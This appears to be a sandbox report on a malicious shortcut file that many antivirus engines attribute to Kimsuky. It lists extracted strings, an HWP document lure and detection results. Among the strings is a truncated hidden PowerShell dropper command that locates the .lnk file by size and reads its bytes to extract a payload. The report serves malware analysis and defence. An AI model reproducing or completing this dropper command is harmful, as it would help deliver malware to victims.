Static | ZeroBOX
No static analysis available.
%windir%\system32\cmd.exe
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Vqk(!
3-3pck/
:7;wm>
I+PB;%
ak;gAb
j)%C$M
HWP Document File
?{)4P{
5!.-09
]+e{$y
FP5)`8
MjK(HT
^C>^iB
.O0RRy
hx>7WX
Fh!Z6Cv7(
j3Y5N7
{IDATx^
H-~E/}
/A(?.=
=Jz~b+
nrDr<F
O*}W<|YT,c
M1AcQd
`g-eqU
x1X:J[
TbBo<P
=Ur5mRNa
W5.4=d
".~Zby
ckJ2mR
DU<N5v
fB3XTqM
7}%.i<
WiP(^4
``&gFo
j<VeVSQ
!G*J(|
y\93r~
uyOE"[
#=93G*9!Gf
8W%Wj1
o8^=G{J5
v+l~D,
jZ,c(g
AWj_d|JZu
NIKEsz
HKEszN
k\hZTS
yV6mPuh
4.4=jP
SM#-E1
ZMgT%q
=4h(_+
poO*l}
i>;eV/
7'y?P
*i~;Xp+
o/VzE,
lmx>UB5
WN6^=j
d5{,{Z
j:IUE5
=UN5=D
9yOE"[
2:,i9?
69"9^E
7l>4hR
G.|h=F
<G*9!Gp
2{,iB3
|IiMJ(l>Q
*RM]/^
WXv&:P
vbmndfjfhghdddddddddddvbmndfjfhghdddddddddddvbmndfjfhghdddddddddddvbmndfjfhghdddddddddddvbmndfjfhghddddddddddd
vbmndfjfhghdddddddddddvbmndfjfhghddddddddddd
AType: Text Document
Size: 5.23 KB
Date modified: 01/02/2020 11:23
/c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = '%temp%';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $
.\8.hwp
%windir%\system32\cmd.exe
Root Entry
FileHeader
HwpSummaryInformation
DocInfo
Root Entry
FileHeader
HwpSummaryInformation
DocInfo
2024.4.19.(
<1 ><><
*
. 2024
*
<2 ><><
] 4.19(
) 9:30-16:20
(Zoom
SoftPower
4:11:36
12, 0, 0, 535 WIN32LEWindows_10
SoftPower
4:11:36
BodyText
PrvImage
PrvText
DocOptions
Scripts
JScriptVersion
DefaultJScript
_LinkDoc
Section0
Antivirus Signature
Bkav Clean
Lionic Trojan.WinLNK.Boxter.4!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Lnk.trojan.A12022571
Skyhigh BehavesLike.Dropper.tx
ALYac Trojan.Agent.LNK.Gen
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Scr.Mallnk!gen13
ESET-NOD32 LNK/Kimsuky.H
TrendMicro-HouseCall TROJ_FRS.0NA103D424
Avast LNK:Agent-IL [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Multi.Powecod.i
BitDefender Heur.BZC.YAX.Boxter.331.8F498F23
NANO-Antivirus Clean
ViRobot LNK.S.PowerShell.1110652
MicroWorld-eScan Heur.BZC.YAX.Boxter.331.8F498F23
Tencent Win32.Trojan.Powecod.Bgow
TACHYON Clean
Sophos Troj/LnkObf-T
F-Secure Clean
DrWeb Trojan.MulDrop26.46164
VIPRE Heur.BZC.YAX.Boxter.331.8F498F23
TrendMicro TROJ_FRS.0NA103D424
FireEye Heur.BZC.YAX.Boxter.331.8F498F23
Emsisoft Trojan.PowerShell.Gen (A)
huorong TrojanDownloader/LNK.Agent.co
GData Heur.BZC.YAX.Boxter.331.8F498F23
Jiangmin Clean
Varist LNK/ABTrojan.AGHM-1
Avira Clean
Antiy-AVL Clean
Kingsoft Script.Troj.CMDLnk.22143
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.YAX.Boxter.331.8F498F23
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Multi.Powecod.i
Microsoft Trojan:Win32/Casdet!rfn
Google Detected
AhnLab-V3 Downloader/LNK.Powershell.S2543
Acronis Clean
McAfee LNK/Agent.aj
MAX malware (ai score=83)
VBA32 Trojan.Link.Crafted
Zoner Clean
Rising Trojan.PSRunner/LNK!1.DB7E (CLASSIC)
Yandex Clean
Ikarus Trojan.SuspectCRC
MaxSecure Clean
Fortinet LNK/Kimsuky.GOSU!tr
BitDefenderTheta Clean
AVG LNK:Agent-IL [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Trojan:Win/Kimsuky.H
No IRMA results available.